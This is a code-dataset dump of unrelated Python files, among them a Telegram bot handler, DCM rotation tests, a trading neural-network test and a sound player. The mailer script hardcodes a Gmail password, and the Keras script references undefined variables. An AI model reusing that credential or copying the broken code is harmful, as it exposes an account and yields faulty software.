s[1].replace(\"@\",\"\")\n\t\t\t\tgame_nick = \"\"\n\t\t\t\tfor i in range(3,len(s)):\n\t\t\t\t\tgame_nick += f\"{s[i]} \"\n\t\t\t\tgame_nick = game_nick.rstrip()\n\t\t\t\tbot.reply_to(message, f'Попытка зарегистрировать {telega_username} с кодом {ally_code} и ником в игре \"{game_nick}\"')\n\t\t\telse:\n\t\t\t\tbot.reply_to(message, 'Регистрация невозможна! Корректное использование:\\n`!twinreg username code nick_in_game', parse_mode=\"Markdown\")\n\t\t\t\tmy_logger.info(\"Registration not possible, wrong command format\")\n\n\t\telse:\n\t\t\tbot.reply_to(message, 'Регистрация невозможна! Корректное использование:\\n`!twinreg username code nick_in_game', parse_mode=\"Markdown\")\n\t\t\tmy_logger.info(\"Registration not possible, wrong command format\")\n\n\n\t\t# далее исполняется только если код союзника = девятизначное число в ally_code, а также установлен telega_username + game_nick\n\t\tif ally_code and telega_username and game_nick:\n\t\t\t\n\t\t\tnew_user = {'user': telega_username, 'ally_code': ally_code, 'swgoh_name': game_nick}\n\t\t\tcollection_users_twin.insert_one(new_user)\n\t\t\tbot.send_message(message.chat.id, f'Пользователь {telega_username} успешно зарегистрирован в качестве дубля! Имя в SWGOH: {game_nick}')\n\t\t\tmy_logger.info(f\"Twin registration successful! SWGOH name {game_nick}\")\n\n\n\texcept Exception as e:\n\n\t\tbot.reply_to(message, \"Произошла ошибка, попробуйте позже!\")\n\t\tmy_logger.info(f\"Something went wrong during !reg: {e}\")","sub_path":"handler_reg.py","file_name":"handler_reg.py","file_ext":"py","file_size_in_byte":8403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"318942602","text":"from socket import *\n\n# Parameters\nTCP_IP = 'localhost'\nTCP_PORT = 12003\nBUFFER_SIZE = 1024\n\n# Prepare a client socket\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect((TCP_IP, TCP_PORT))\n\n# Send message to GET HTML file\nMESSAGE = b'GET HelloWorld.html'\nclientSocket.send(MESSAGE)\n\n# GET the full content from the HTML file\nfull_content = ''\n\nwhile True:\n data = clientSocket.recv(BUFFER_SIZE)\n if not data:\n break\n data = data.decode('utf-8')\n full_content += data\n \nwith open('files_from_server/HelloWorld.html', 'w') as f:\n f.write(full_content)\n \nprint(\"received data:\", full_content)\n\n# Close Client\nclientSocket.close()\nprint(\"\\n\\nClient close successfully!\")\n\n","sub_path":"P1/WebServer/web_client.py","file_name":"web_client.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"417590443","text":"from setuptools import setup, find_packages\n\n__author__ = 'Matt Ryan '\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\ndef parse_reqs(file_path):\n with open(file_path, 'rt') as fobj:\n lines = map(str.strip, fobj)\n lines = filter(None, lines)\n lines = filter(lambda x: x.startswith(\"#\"), lines)\n return tuple(lines)\n\n\nsetup(\n name=\"napalm-edgeswitch\",\n version=\"0.0.2\",\n packages=find_packages(),\n author=\"Juan Gomez\",\n author_email=\"jgomez@phicus.es\",\n description=\"Network Automation and Programmability Abstraction Layer driver for Ubiquti Edgeswitch using SSH\",\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n classifiers=[\n 'Topic :: Utilities',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: MacOS',\n ],\n url=\"https://github.com/johnbarneta/napalm-edgeswitch\",\n include_package_data=True,\n install_requires=(\n 'napalm==2.*',\n 'netmiko==2.*',\n ),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"382642182","text":"import keras\nfrom keras import layers\nfrom keras.models import Sequential, load_model\nfrom keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\nbatch_size = 32\nimg_height = 180\nimg_width = 180\ntrain_dg = keras.preprocessing.image.ImageDataGenerator(rescale=1./255, validation_split=0.2)\ntrain_dg = keras.preprocessing.image.ImageDataGenerator(rescale=1./255)\ntrain_generator = train_dg.flow_from_directory(\n 'Large',\n class_mode='binary', seed=123)\nvalidation_generator = train_dg.flow_from_directory(\n 'Large',\n class_mode='binary', seed=123)\nclass_names = train_dg.class_names\nnormalization_layer = layers.experimental.preprocessing.Rescaling(1./255)\nnum_classes = len(class_names)\n\nmodel = Sequential([\n layers.experimental.preprocessing.Rescaling(1./255, input_shape=(img_height, img_width, 3)),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(32, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(64, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Flatten(),\n layers.Dense(128, activation='relu'),\n layers.Dense(num_classes)\n])\nmodel.compile(optimizer='adam',\n loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\nepochs=10\nhistory = model.fit(\n train_ds,\n validation_data=val_ds,\n epochs=epochs\n)\nwith open('model.h5', 'w') as f:\n f.close()\nmodel.save('model.h5')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"107448057","text":"from numpy.testing import assert_allclose, run_module_suite\nimport numpy as np\nfrom pyins import dcm\n\n\ndef test_from_basic():\n A1 = dcm.from_basic(1, 30)\n A1_true = np.array([\n [1, 0, 0],\n [0, 0.5 * 3**0.5, -0.5],\n [0, 0.5, 0.5 * 3**0.5]\n ])\n assert_allclose(A1, A1_true, rtol=1e-10)\n\n A2 = dcm.from_basic(2, 30)\n A2_true = np.array([\n [0.5 * 3 ** 0.5, 0, 0.5],\n [0, 1, 0],\n [-0.5, 0, 0.5 * 3**0.5]\n ])\n assert_allclose(A2, A2_true, rtol=1e-10)\n\n A3 = dcm.from_basic(3, 30)\n A3_true = np.array([\n [0.5 * 3**0.5, -0.5, 0],\n [0.5, 0.5 * 3**0.5, 0],\n [0, 0, 1]\n ])\n assert_allclose(A3, A3_true, rtol=1e-10)\n\n A4 = dcm.from_basic(3, [30, 60])\n A4_true = np.array([\n [[0.5 * 3**0.5, -0.5, 0],\n [0.5, 0.5 * 3**0.5, 0],\n [0, 0, 1]],\n [[0.5, -0.5 * 3**0.5, 0],\n [0.5 * 3**0.5, 0.5, 0],\n [0, 0, 1]]\n ])\n assert_allclose(A4, A4_true, rtol=1e-10)\n\n\ndef test_from_rv():\n rv1 = np.array([1, 0, 0]) * np.pi / 3\n A1 = dcm.from_rv(rv1)\n A1_true = np.array([[1, 0, 0],\n [0, 0.5, -0.5 * np.sqrt(3)],\n [0, 0.5 * np.sqrt(3), 0.5]])\n assert_allclose(A1, A1_true, rtol=1e-10)\n\n rv2 = np.array([1, 1, 1]) * 1e-10\n A2 = dcm.from_rv(rv2)\n A2_true = np.array([[1, -1e-10, 1e-10],\n [1e-10, 1, -1e-10],\n [-1e-10, 1e-10, 1]])\n assert_allclose(A2, A2_true, rtol=1e-10)\n\n n = np.array([-0.5, 1/np.sqrt(2), 0.5])\n theta = np.pi / 6\n rv3 = n * theta\n s = np.sin(theta)\n c = np.cos(theta)\n\n A3 = dcm.from_rv(rv3)\n A3_true = np.array([\n [(1-c)*n[0]*n[0] + c, (1-c)*n[0]*n[1] - n[2]*s,\n (1-c)*n[0]*n[2] + s*n[1]],\n [(1-c)*n[1]*n[0] + s*n[2], (1-c)*n[1]*n[1] + c,\n (1-c)*n[1]*n[2] - s*n[0]],\n [(1-c)*n[2]*n[0] - s*n[1], (1-c)*n[2]*n[1] + s*n[0],\n (1-c)*n[2]*n[2] + c]\n ])\n assert_allclose(A3, A3_true, rtol=1e-10)\n\n rv = np.empty((30, 3))\n rv[:10] = rv1\n rv[10:20] = rv2\n rv[20:] = rv3\n A_true = np.empty((30, 3, 3))\n A_true[:10] = A1_true\n A_true[10:20] = A2_true\n A_true[20:] = A3_true\n A = dcm.from_rv(rv)\n assert_allclose(A, A_true, rtol=1e-8)\n\n rv = rv[::4]\n A_true = A_true[::4]\n A = dcm.from_rv(rv)\n assert_allclose(A, A_true, rtol=1e-10)\n\n\ndef test_to_rv():\n A1 = np.identity(3)\n rv1 = dcm.to_rv(A1)\n assert_allclose(rv1, 0, atol=1e-10)\n\n rv2 = 1e-10 * np.ones(3)\n A2 = np.array([\n [1, -rv2[2], rv2[1]],\n [rv2[2], 1, -rv2[0]],\n [-rv2[1], rv2[0], 1]\n ])\n assert_allclose(dcm.to_rv(A2), rv2, rtol=1e-10)\n\n A3 = np.array([\n [1/2**0.5, 1/2**0.5, 0],\n [-1/2**0.5, 1/2**0.5, 0],\n [0, 0, 1]\n ])\n rv3 = np.array([0, 0, -np.pi / 4])\n assert_allclose(dcm.to_rv(A3), rv3, rtol=1e-10)\n\n A = np.empty((30, 3, 3))\n A[:10] = A1\n A[10:20] = A2\n A[20:30] = A3\n rv = np.empty((30, 3))\n rv[:10] = rv1\n rv[10:20] = rv2\n rv[20:] = rv3\n assert_allclose(dcm.to_rv(A), rv, rtol=1e-10)\n\n A = A[::4]\n rv = rv[::4]\n assert_allclose(dcm.to_rv(A), rv, rtol=1e-10)\n\n\ndef test_dcm_rv_conversion():\n # Test conversions on random inputs.\n rng = np.random.RandomState(0)\n\n axis = rng.randn(20, 3)\n axis /= np.linalg.norm(axis, axis=1)[:, np.newaxis]\n angle = rng.uniform(-np.pi, np.pi, size=axis.shape[0])\n rv = axis * angle[:, np.newaxis]\n rv[::5] *= 1e-8\n\n A = dcm.from_rv(rv)\n rv_from_A = dcm.to_rv(A)\n assert_allclose(rv, rv_from_A, rtol=1e-10)\n\n rv = rv[:5]\n A = A[:5]\n rv_from_A = dcm.to_rv(A)\n assert_allclose(rv, rv_from_A, rtol=1e-10)\n\n\ndef test_dcm_quat_conversion():\n np.random.seed(0)\n h = np.random.uniform(0, 360, 20)\n p = np.random.uniform(-90, 90, 20)\n r = np.random.uniform(-180, 180, 20)\n\n As = dcm.from_hpr(h, p, r)\n for A in As:\n q = dcm.to_quat(A)\n Ac = dcm.from_quat(q)\n assert_allclose(Ac, A, rtol=1e-14, atol=1e-16)\n\n q = dcm.to_quat(As)\n Asc = dcm.from_quat(q)\n assert_allclose(Asc, As, rtol=1e-14, atol=1e-16)\n\n\ndef test_dcm_mrp_conversion():\n np.random.seed(1)\n h = np.random.uniform(0, 360, 100)\n p = np.random.uniform(-90, 90, 100)\n r = np.random.uniform(-180, 180, 100)\n\n As = dcm.from_hpr(h, p, r)\n for A in As:\n grp = dcm.to_mrp(A)\n Ac = dcm.from_mrp(grp)\n assert_allclose(Ac, A, rtol=1e-14, atol=1e-15)\n\n grp = dcm.to_mrp(As)\n Asc = dcm.from_mrp(grp)\n assert_allclose(Asc, As, rtol=1e-14, atol=1e-15)\n\n\ndef test_dcm_gibbs_conversion():\n np.random.seed(1)\n h = np.random.uniform(0, 360, 100)\n p = np.random.uniform(-90, 90, 100)\n r = np.random.uniform(-180, 180, 100)\n\n As = dcm.from_hpr(h, p, r)\n for A in As:\n grp = dcm.to_gibbs(A)\n Ac = dcm.from_gibbs(grp)\n assert_allclose(Ac, A, rtol=1e-14, atol=1e-15)\n\n grp = dcm.to_gibbs(As)\n Asc = dcm.from_gibbs(grp)\n assert_allclose(Asc, As, rtol=1e-14, atol=1e-15)\n\n\ndef test_from_hpr():\n hpr1 = [30, 0, 0]\n A_true1 = np.array([[np.sqrt(3)/2, 0.5, 0],\n [-0.5, np.sqrt(3)/2, 0],\n [0, 0, 1]])\n assert_allclose(dcm.from_hpr(*hpr1), A_true1, rtol=1e-10)\n\n hpr2 = np.rad2deg([1e-10, 3e-10, -1e-10])\n A_true2 = np.array([[1, 1e-10, -1e-10],\n [-1e-10, 1, -3e-10],\n [1e-10, 3e-10, 1]])\n assert_allclose(dcm.from_hpr(*hpr2), A_true2, rtol=1e-8)\n\n hpr3 = [45, -30, 60]\n A_true3 = np.array([\n [-np.sqrt(6)/8 + np.sqrt(2)/4, np.sqrt(6)/4,\n np.sqrt(2)/8 + np.sqrt(6)/4],\n [-np.sqrt(2)/4 - np.sqrt(6)/8, np.sqrt(6)/4,\n -np.sqrt(6)/4 + np.sqrt(2)/8],\n [-0.75, -0.5, np.sqrt(3)/4]\n ])\n assert_allclose(dcm.from_hpr(*hpr3), A_true3, rtol=1e-8)\n\n hpr = np.vstack((hpr1, hpr2, hpr3)).T\n A = np.array((A_true1, A_true2, A_true3))\n assert_allclose(dcm.from_hpr(*hpr), A, rtol=1e-8)\n\n\ndef test_to_hpr():\n A1 = np.identity(3)\n hpr1 = np.zeros(3)\n assert_allclose(dcm.to_hpr(A1), hpr1, atol=1e-10)\n\n A2 = np.array([[1, 1e-10, -2e-10],\n [-1e-10, 1, 3e-10],\n [2e-10, -3e-10, 1]])\n hpr2 = np.rad2deg([1e-10, -3e-10, -2e-10])\n assert_allclose(dcm.to_hpr(A2), hpr2, atol=1e-10)\n\n A3 = np.array([\n [1/np.sqrt(2), 0, 1/np.sqrt(2)],\n [0, 1, 0],\n [-np.sqrt(2), 0, np.sqrt(2)]\n ])\n hpr3 = np.array([0, 0, 45])\n assert_allclose(dcm.to_hpr(A3), hpr3, rtol=1e-10)\n\n A4 = np.array([[-1, 0, 0], [0, 0, -1], [0, -1, 0]])\n hpr4 = np.array([180, -90, 0])\n assert_allclose(dcm.to_hpr(A4), hpr4, rtol=1e-10)\n\n A = np.empty((20, 3, 3))\n A[:5] = A1\n A[5:10] = A2\n A[10:15] = A3\n A[15:] = A4\n hpr = np.empty((20, 3))\n hpr[:5] = hpr1\n hpr[5:10] = hpr2\n hpr[10:15] = hpr3\n hpr[15:20] = hpr4\n\n ret = dcm.to_hpr(A)\n for i in range(3):\n assert_allclose(ret[i], hpr[:, i], rtol=1e-10)\n\n\ndef test_dcm_hpr_conversion():\n rng = np.random.RandomState(0)\n\n h = rng.uniform(0, 360, 20)\n p = rng.uniform(-90, 90, 20)\n r = rng.uniform(-180, 180, 20)\n\n A = dcm.from_hpr(h, p, r)\n h_r, p_r, r_r = dcm.to_hpr(A)\n\n assert_allclose(h, h_r, rtol=1e-10)\n assert_allclose(p, p_r, rtol=1e-10)\n assert_allclose(r, r_r, rtol=1e-10)\n\n\ndef test_from_llw():\n llw1 = np.array([90, -90, 0])\n A1 = np.identity(3)\n assert_allclose(dcm.from_llw(*llw1), A1, rtol=1e-10, atol=1e-10)\n assert_allclose(dcm.from_llw(*llw1[:2]), A1, rtol=1e-10, atol=1e-10)\n\n llw2 = np.array([90, -90, np.rad2deg(1e-9)])\n A2 = np.array([[1, -1e-9, 0], [1e-9, 1, 0], [0, 0, 1]])\n assert_allclose(dcm.from_llw(*llw2), A2, rtol=1e-10, atol=1e-10)\n\n llw3 = np.array([-30, -45, 90])\n A3 = np.array([[np.sqrt(2)/4, -np.sqrt(2)/2, np.sqrt(6)/4],\n [-np.sqrt(2)/4, -np.sqrt(2)/2, -np.sqrt(6)/4],\n [np.sqrt(3)/2, 0, -0.5]])\n\n assert_allclose(dcm.from_llw(*llw3), A3, rtol=1e-10, atol=1e-10)\n\n A4 = np.array([[2**0.5/2, 2**0.5/4, 6**0.5/4],\n [2**0.5/2, -2**0.5/4, -6**0.5/4],\n [0, 3**0.5/2, -0.5]])\n assert_allclose(dcm.from_llw(*llw3[:2]), A4, rtol=1e-10, atol=1e-10)\n\n llw = np.empty((15, 3))\n llw[:5] = llw1\n llw[5:10] = llw2\n llw[10:] = llw3\n A = np.empty((15, 3, 3))\n A[:5] = A1\n A[5:10] = A2\n A[10:] = A3\n assert_allclose(dcm.from_llw(*llw.T), A, rtol=1e-10, atol=1e-10)\n\n\ndef test_to_llw():\n A1 = np.identity(3)\n llw1 = np.array([90, 0, -90])\n assert_allclose(dcm.to_llw(A1), llw1, rtol=1e-10)\n\n A2 = np.array([[0, 0, 1], [1, 0, 0], [0, 1, 0]])\n llw2 = np.array([0, 0, 0])\n assert_allclose(dcm.to_llw(A2), llw2, atol=1e-10)\n\n A = np.empty((10, 3, 3))\n A[:5] = A1\n A[5:] = A2\n llw = np.empty((10, 3))\n llw[:5] = llw1\n llw[5:] = llw2\n\n ret = dcm.to_llw(A)\n for i in range(3):\n assert_allclose(ret[i], llw[:, i], rtol=1e-10, atol=1e-10)\n\n\ndef test_dcm_llw_conversion():\n rng = np.random.RandomState(0)\n\n lat = rng.uniform(-90, 90, 20)\n lon = rng.uniform(-180, 180, 20)\n wan = rng.uniform(-180, 180, 20)\n\n A = dcm.from_llw(lat, lon, wan)\n lat_r, lon_r, wan_r = dcm.to_llw(A)\n\n assert_allclose(lon_r, lon, rtol=1e-10)\n assert_allclose(lat_r, lat, rtol=1e-10)\n assert_allclose(wan_r, wan, rtol=1e-10)\n\n\ndef test_dcm_Spline():\n ht = [0, 45, 90]\n C = dcm.from_hpr(ht, 0, 0)\n t = [0, 45, 90]\n s = dcm.Spline(t, C)\n\n t_test = [0, 30, 60, 90]\n C_test = s(t_test)\n h, p, r = dcm.to_hpr(C_test)\n assert_allclose(h, [0, 30, 60, 90], rtol=1e-14, atol=1e-16)\n assert_allclose(p, 0, atol=1e-16)\n assert_allclose(r, 0, atol=1e-16)\n\n omega = np.rad2deg(s(t_test, 1))\n assert_allclose(omega[:, 0], 0, atol=1e-16)\n assert_allclose(omega[:, 1], 0, atol=1e-6)\n assert_allclose(omega[:, 2], -1)\n\n beta = np.rad2deg(s(t_test, 2))\n assert_allclose(beta, 0, atol=1e-16)\n\n t = np.linspace(0, 100, 101)\n ht = 10 * t + 5 * np.sin(2 * np.pi * t / 10)\n pt = 7 * t + 3 * np.sin(2 * np.pi * t / 10 + 2)\n rt = -3 * t + 3 * np.sin(2 * np.pi * t / 10 - 2)\n C = dcm.from_hpr(ht, pt, rt)\n s = dcm.Spline(t, C)\n\n Cs = s(t[::-1])\n assert_allclose(Cs[::-1], C)\n\n\ndef test_match_vectors():\n Cab_true = dcm.from_hpr(20, -10, 5)\n vb = np.array([\n [0, 1, 0],\n [0, 0, 1]\n ])\n va = vb.dot(Cab_true.T)\n\n Cab = dcm.match_vectors(va, vb)\n assert_allclose(Cab, Cab_true, atol=1e-16)\n\n Cab = dcm.match_vectors(va, vb, [200, 1])\n assert_allclose(Cab, Cab_true, atol=1e-16)\n\n rng = np.random.RandomState(0)\n vb = rng.rand(100, 3)\n vb /= np.linalg.norm(vb, axis=1)[:, None]\n va = vb.dot(Cab_true.T)\n Cab = dcm.match_vectors(va, vb)\n assert_allclose(Cab, Cab_true, atol=1e-16)\n\n\nif __name__ == '__main__':\n run_module_suite()\n","sub_path":"pyins/tests/test_dcm.py","file_name":"test_dcm.py","file_ext":"py","file_size_in_byte":10934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"261066023","text":"\nfrom functools import cmp_to_key\n\ndef compare(A, B):\n ab = A + B\n ba = B + A \n if int(ab) - int(ba) > 0:\n return -1\n else:\n return 1\n\n\ndef solution(numbers):\n numbers = list(map(str, numbers))\n numbers.sort(key = cmp_to_key(compare))\n ret = ''.join(numbers)\n while len(ret) > 1 and ret[0] == '0':\n ret = ret[1:]\n \n return ret\n","sub_path":"programmers/42746.py","file_name":"42746.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"621325418","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/8/26 9:12\n# @Author : Tony\n\"\"\"神经网络测试用例\"\"\"\nimport sys\n\nimport numpy as np\nfrom datetime import datetime\n\nfrom app.cta_strategy.neural_network import NeuralNetwork\nfrom trader.constant import Exchange, Interval\nfrom vnpy.trader.database import database_manager\n\n\ndef make_input_data(raw_data):\n input_max_high = max([x.high_price for x in raw_data])\n input_min_low = min([x.low_price for x in raw_data])\n input_price_range = input_max_high - input_min_low\n input_max_volume = max([x.volume for x in raw_data])\n\n def parse_price(price):\n return ((price - input_min_low) / input_price_range) + 0.001\n\n return np.array([[parse_price(x.high_price), parse_price(x.open_price), parse_price(x.low_price)\n , parse_price(x.close_price), x.volume / input_max_volume] for x in raw_data])\n\n\ndef make_target_data(raw_data, last_close):\n max_high = max([x.high_price for x in raw_data])\n target_percent = (max_high - last_close) / last_close\n\n target_data_label = np.zeros(output_nodes) + 0.01\n if target_percent > long_profit_percent: # 多开信号\n target_data_label[1] = 0.99\n elif target_percent < - short_profit_percent: # 空开信号\n target_data_label[2] = 0.99\n else:\n target_data_label[0] = 0.99\n\n return target_data_label, target_percent, max_high\n\n\nif __name__ == '__main__':\n input_data_len = 100 # 输入X根分钟K线的数据(高开低收量)= x * 5 个数据点\n target_data_len = 15 # 预测10分钟后的高点\n long_profit_percent = 0.002 # 1万20 盈利点 - 1万1.5 * 2 手续费 = 17 元 单笔\n short_profit_percent = 0.002 # 1万20 盈利点 - 1万1.5 * 2 手续费 = 17 元 单笔\n\n input_nodes = input_data_len * 5\n hidden_nodes = input_data_len * 7\n output_nodes = 3\n learning_rate = 0.1\n\n symbol = 'rb1910'\n exchange = Exchange.SHFE\n interval = Interval.MINUTE\n start = datetime(2019, 6, 10)\n end = datetime.now()\n\n neuralNetwork = NeuralNetwork(input_nodes, hidden_nodes, output_nodes, learning_rate)\n print(\"run nerual network\")\n\n bar_data = database_manager.load_bar_data(symbol, exchange, interval, start, end)\n bar_data_len = len(bar_data)\n print(f\"load bar data size {bar_data_len}, {interval}\")\n\n if bar_data_len < 1000:\n print(\"need more data >= 50000\")\n sys.exit()\n\n test_data_len = 200 # 测试集\n train_data_len = bar_data_len - test_data_len # 训练集\n print(f\"train data size: {train_data_len}, test data size: {test_data_len}\")\n\n epochs = 1\n for e in range(epochs):\n print(\"Start epoch: \", e)\n train_range = train_data_len - input_data_len - target_data_len + 1\n for train_index in range(train_range):\n input_bar_data = bar_data[train_index:train_index + input_data_len]\n target_bar_data = bar_data[train_index + input_data_len:train_index + input_data_len + target_data_len]\n\n input_data = make_input_data(input_bar_data).reshape(1, input_nodes)\n target_data, _, _ = make_target_data(target_bar_data, input_bar_data[-1].close_price)\n\n neuralNetwork.train(input_data, target_data)\n pass\n\n test_range = test_data_len - input_data_len - target_data_len + 1\n print(f\"Start test range: {test_range}, date: {bar_data[train_data_len].datetime}\")\n\n scordcard = []\n prediction_result = []\n actual_result = []\n for test_index in range(test_range):\n test_target_index = train_data_len + test_index + input_data_len\n\n input_bar_data = bar_data[train_data_len + test_index: test_target_index]\n target_bar_data = bar_data[test_target_index: test_target_index + target_data_len]\n\n input_data = make_input_data(input_bar_data).reshape(1, input_nodes)\n input_last_close = input_bar_data[-1].close_price\n target_data, target_profit_percent, target_max_high = make_target_data(target_bar_data, input_last_close)\n\n output = neuralNetwork.query(input_data)\n output_label = int(np.argmax(output))\n\n current_label = 0\n if target_profit_percent > long_profit_percent: # 多开信号\n current_label = 1\n print(bar_data[test_target_index].datetime, input_last_close, target_max_high, target_profit_percent)\n elif target_profit_percent < - short_profit_percent: # 空开信号\n current_label = 2\n else:\n current_label = 0\n\n prediction_result.append(output_label)\n actual_result.append(current_label)\n\n if current_label == output_label:\n scordcard.append(1)\n else:\n scordcard.append(0)\n\n scordcard_array = np.asarray(scordcard)\n print(\"Performance = \", scordcard_array.sum() / scordcard_array.size)\n print(f\"Predict Long {prediction_result.count(1)} , Short {prediction_result.count(2)}, Sleep {prediction_result.count(0)}\")\n print(f\"Actual Long {actual_result.count(1)} , Short {actual_result.count(2)}, Sleep {actual_result.count(0)}\")\n","sub_path":"tests/neural_network/test_neural_network.py","file_name":"test_neural_network.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"17790138","text":"import yagmail\n\n\nuser = 'astro.coffee.sheffield@gmail.com' # address to download and send email from\npwd = 'crack_astro'\nrecipient = []\n\ncontents = '🔭☕ Astro Coffee at 10:00 in the Austin Room ☕🔭 \\n\\n Sent by CRACKbot'\n\nwith open('emails.txt') as f:\n recipient.extend(f.read().split())\nyag = yagmail.SMTP(user, pwd)\nyag.send(recipient, \"🔭☕ Astro COFFEE at 10:00 ☕🔭\", contents) ","sub_path":"astro_coffee.py","file_name":"astro_coffee.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"261617265","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n\"\"\"\n@File : test_2 \n@Time : 2021/3/21 8:59 下午\n@Author : Xuesong Chen\n@Description : \n\"\"\"\nn, u, v, s, t, m = map(int,input().split(' '))\n\nmin_time = None\nfor y in range(n//2+1, 0, -1):\n x = n-2*y\n tili = s*x + t*pow(y, 2)\n if tili > m:\n continue\n else:\n time = u*x + v*y\n print(time)\n break\n # if min_time == None:\n # min_time = time\n # if time < min_time:\n # min_time = time\n # print(x, y, time, tili)\n\n# print(min_time)","sub_path":"tecent/test_2_2.py","file_name":"test_2_2.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"323317123","text":"\"\"\"Access to the sounddevice library. This library allows to\nuse sound devices for recording and playback. The library\nis based on the PortAudio library [1].\n\n\n[1] http://www.portaudio.com/\n\"\"\"\n# FIXME[bug]: I am experiences frequent crashes on my office computer\n# (Ubuntu 16.04):\n# src/hostapi/alsa/pa_linux_alsa.c:3636:\n# PaAlsaStreamComponent_BeginPolling:\n# Assertion `ret == self->nfds' failed.\n#\n#\n# cat /proc/asound/version\n# Advanced Linux Sound Architecture Driver Version k4.4.0-179-generic.\n#\n# aplay --version\n# aplay: version 1.1.0 by Jaroslav Kysela \n#\n# pulseaudio --version\n# pulseaudio 8.0\n#\n# python -c \"import sounddevice; print(sounddevice.__version__)\"\n# 0.4.0\n\n\n# standard imports\nfrom typing import Union\nimport logging\nimport threading\n\n# third party imports\nimport numpy as np\nimport sounddevice as sd\n\n# toolbox imports\nfrom ..base.sound import (SoundPlayer as SoundPlayerBase,\n SoundRecorder as SoundRecorderBase)\nfrom ..base import get_default_run\n\n# logging\nLOG = logging.getLogger(__name__)\n\n\nclass SoundPlayer(SoundPlayerBase):\n \"\"\"An implementation of a :py:class:`SoundPlayerBase` based on\n the `sounddevice` library.\n \"\"\"\n\n def __init__(self, samplerate: float = None, channels: int = None,\n **kwargs) -> None:\n super().__init__(**kwargs)\n self._lock = threading.Lock()\n self._event = threading.Event()\n\n if channels is None:\n channels = 2 if self._sound is None else self._sound.channels\n if samplerate is None:\n samplerate = (44100 if self._sound is None else\n self._sound.samplerate)\n\n # _finishing: this is a hack - we need it to mark a stream that\n # finishes, but that has not yet been stopped (see method _finished).\n self._blocking = False\n self._finishing = False\n self._stream = None\n self._check_stream(samplerate=samplerate, channels=channels)\n\n def _check_stream(self, samplerate: float = None,\n channels: int = None) -> None:\n \"\"\"This function is a hack to fix a problem with an sounddevice\n streams in an unsane state: these streams have both, `active`\n and `stopped` flag (and also the `closed` flag) set to `False`.\n Such a state seems to occur when the stream is stopped\n (or aborted) from within the stream Thread (while stopping\n or aborting from another Thread seems to be ok).\n Such unsane streams can not be restarted by calling stream.start(),\n they seem to be dead (at least I did not find a way to revive\n them). As a workaround, we simply create a new stream here to\n replace the original one.\n \"\"\"\n # Check the state of the current stream\n if self._stream is not None and not self._stream.closed:\n if self._stream.active or self._stream.stopped:\n return # Stream seems to be ok\n\n LOG.warning(\"SoundDevicePlayer: \"\n \"discovered unsane stream - creating a new one ...\")\n # Stream seems to be dead - copy stream parameters\n samplerate = samplerate or self._stream.samplerate\n channels = channels or self._stream.channels\n self._stream.close()\n\n # create a new stream\n self._stream = sd.OutputStream(samplerate=samplerate,\n channels=channels,\n callback=self._play_block,\n finished_callback=self._finished)\n\n def _set_position(self, position: float) -> None:\n \"\"\"Set the current playback position.\n \"\"\"\n # as we set the position from within the playback loop,\n # we lock the operation to avoid interferences.\n with self._lock:\n super()._set_position(position)\n\n @property\n def playing(self) -> bool:\n return self._stream.active and not self._finishing\n\n @property\n def samplerate(self) -> float:\n \"\"\"Samplerate to be used for playback.\n \"\"\"\n return self._stream.samplerate\n\n @property\n def channels(self) -> int:\n \"\"\"Number of channels to be used for playback.\n \"\"\"\n return self._stream.channels\n\n def play(self, *args, run: bool = None, **kwargs):\n # we have to overwrite the super method to care for the 'run'\n # parameter (which would usually be done by the @run decorator):\n # as the stream playback is done in its own thread (and there\n # is no way to prevent this from happening), we will realize\n # a blocking call (run=False), explicitly waiting for the\n # playback to finish.\n self._blocking = not get_default_run(run)\n super().play(self, *args, run=False, **kwargs)\n\n def _play(self) -> None:\n \"\"\"Start the actual playback in a background thread.\n \"\"\"\n self._check_stream()\n # another hack:\n self._finishing = False\n self._event.clear()\n\n # this will start the background thread, periodically invoking\n # _play_block\n self._stream.start()\n\n print(\"Soundplayer: blocking:\", self._blocking)\n if self._blocking:\n try:\n self._event.wait()\n finally:\n # Playback/recording may have been stopped with\n # a `KeyboardInterrupt` - make sure the stream\n # is closed\n self._stream.close(ignore_errors=True)\n\n def _play_block(self, outdata: np.ndarray, frames: int,\n time, status: sd.CallbackFlags) -> None:\n \"\"\"Callback to be called by the output stream.\n\n Arguments\n ---------\n outdata: np.ndarray\n An array of shape (frames, channels) and dtype float32.\n This is a buffer provided by the OutputStream in which\n the next block of output data should be 